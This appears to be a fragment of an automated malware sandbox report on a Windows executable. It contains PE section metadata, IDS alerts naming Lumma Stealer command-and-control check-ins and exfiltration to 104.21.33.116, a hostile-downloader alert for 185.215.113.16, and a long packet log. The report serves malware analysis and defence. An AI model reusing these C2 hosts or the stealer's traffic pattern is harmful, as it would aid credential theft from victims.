                                                                                                                                                                                        rvusllyz0x4ac0000x10000x4009c3c670f2d847cf77fbca3bbf0590f14False0.7958984375data6.2127163800852365IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        .taggant0x4ad0000x30000x22005c6436114893d413b276c38bb6c5a087False0.07892922794117647DOS executable (COM)0.7743333712890474IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                        RT_MANIFEST0x4abb340x256ASCII text, with CRLF line terminators0.5100334448160535
                                                                                                                                                                                        DLLImport
                                                                                                                                                                                        kernel32.dlllstrcpy
                                                                                                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                        2024-11-24T02:13:03.585272+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:04.287887+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:04.287887+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549704104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:05.694365+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:06.391065+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:06.391065+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:07.982795+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549706104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:08.954480+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549706104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:10.360481+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:12.849857+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549708104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:15.676940+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549709104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:18.347379+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549712104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:23.494801+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549723104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:24.196379+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549723104.21.33.116443TCP
                                                                                                                                                                                        2024-11-24T02:13:25.754001+01002019714ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile2192.168.2.549729185.215.113.1680TCP
                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                        Nov 24, 2024 02:12:55.244170904 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:12:55.259771109 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:12:55.353527069 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:13:02.301948071 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:02.302000999 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:02.302073956 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:02.303514004 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:02.303529024 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:03.585192919 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:03.585272074 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:03.589813948 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:03.589831114 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:03.590163946 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:03.634645939 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:03.638207912 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:03.638225079 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:03.638448954 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.287765026 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.288048029 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.288125992 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.289926052 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.289944887 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.289968014 CET49704443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.289973974 CET44349704104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.470778942 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.470808983 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.470900059 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.474839926 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:04.474852085 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:04.853409052 CET49674443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:13:04.869045019 CET49675443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:13:04.962800026 CET49673443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:13:05.694230080 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:05.694365025 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:05.696660995 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:05.696666002 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:05.697163105 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:05.698615074 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:05.698652983 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:05.698707104 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391047001 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391192913 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391266108 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391287088 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391386986 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391437054 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391442060 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391558886 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391607046 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.391612053 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.399089098 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.399157047 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.399162054 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.415642023 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.415710926 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.415718079 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.462805986 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.510373116 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.556535959 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.556541920 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582416058 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582483053 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582488060 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582672119 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582742929 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582789898 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582798958 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582808018 CET49705443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.582813025 CET44349705104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.715701103 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.715745926 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:06.715810061 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.716453075 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:06.716468096 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:07.593766928 CET4434970323.1.237.91192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:07.593862057 CET49703443192.168.2.523.1.237.91
                                                                                                                                                                                        Nov 24, 2024 02:13:07.982667923 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:07.982795000 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:07.984195948 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:07.984209061 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:07.984534025 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:07.985920906 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:07.986116886 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:07.986155033 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:08.954545975 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:08.954840899 CET44349706104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:08.954896927 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:08.954941034 CET49706443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:09.137989998 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:09.138032913 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:09.138145924 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:09.138619900 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:09.138636112 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:10.360346079 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:10.360481024 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:10.378671885 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:10.378685951 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:10.379623890 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:10.393044949 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:10.393497944 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:10.393552065 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:10.393630981 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:10.393635988 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:11.234440088 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:11.234733105 CET44349707104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:11.234855890 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:11.234914064 CET49707443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:11.584398985 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:11.584439039 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:11.584531069 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:11.584897995 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:11.584913015 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:12.849745035 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:12.849857092 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:12.880206108 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:12.880228043 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:12.881158113 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:12.882942915 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:12.883137941 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:12.883203030 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:12.883361101 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:12.883375883 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:13.732137918 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:13.732426882 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:13.732501030 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:13.759491920 CET49708443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:13.759522915 CET44349708104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:14.417051077 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:14.417109966 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:14.417208910 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:14.417665958 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:14.417685032 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.676848888 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.676939964 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:15.678579092 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:15.678591013 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.678914070 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.680592060 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:15.680758953 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:15.680772066 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.763705015 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:15.763756037 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:15.763864994 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:15.773823977 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:15.773853064 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:16.416428089 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:16.416698933 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:16.416790962 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:16.421957970 CET49709443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:16.421969891 CET44349709104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.083252907 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:17.083301067 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.083733082 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:17.083733082 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:17.083771944 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.491529942 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.491614103 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:17.493685961 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:17.493693113 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.493968964 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:17.540935040 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:18.347294092 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.347378969 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.348844051 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.348859072 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.349476099 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.350783110 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.351624966 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.351677895 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.351941109 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.351988077 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.352211952 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.352284908 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.353003979 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.353029013 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.353250980 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.353286982 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.355475903 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.355506897 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.355525970 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.355747938 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.355787039 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.399362087 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.399719000 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.399801016 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.399823904 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.447371006 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.447639942 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.447734118 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.447792053 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.491338968 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.491517067 CET49712443192.168.2.5104.21.33.116
                                                                                                                                                                                        Nov 24, 2024 02:13:18.535376072 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.712976933 CET44349712104.21.33.116192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.716490984 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:18.716542959 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:18.716624022 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:18.717068911 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:18.717087030 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.120599031 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:19.163357019 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677618980 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677649021 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677659035 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677675962 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677712917 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677776098 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677834034 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677870035 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:19.677891970 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:19.695053101 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.695141077 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:19.695168018 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.701900005 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:19.703284979 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:20.585819006 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:20.585922956 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:20.587796926 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:20.587810040 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:20.588224888 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:20.596426964 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:20.639363050 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080276012 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080306053 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080324888 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080501080 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080521107 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.080575943 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.134596109 CET49710443192.168.2.520.109.210.53
                                                                                                                                                                                        Nov 24, 2024 02:13:21.134615898 CET4434971020.109.210.53192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278070927 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278129101 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278170109 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278207064 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278238058 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.278261900 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322168112 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322220087 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322257042 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322283030 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322310925 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.322335005 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469583035 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469630957 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469775915 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469775915 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469799995 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.469893932 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500675917 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500725985 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500866890 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500866890 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500885010 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.500941038 CET49714443192.168.2.513.107.246.63
                                                                                                                                                                                        Nov 24, 2024 02:13:21.521478891 CET4434971413.107.246.63192.168.2.5
                                                                                                                                                                                        Nov 24, 2024 02:13:21.521541119 CET4434971413.107.246.63192.168.2.5
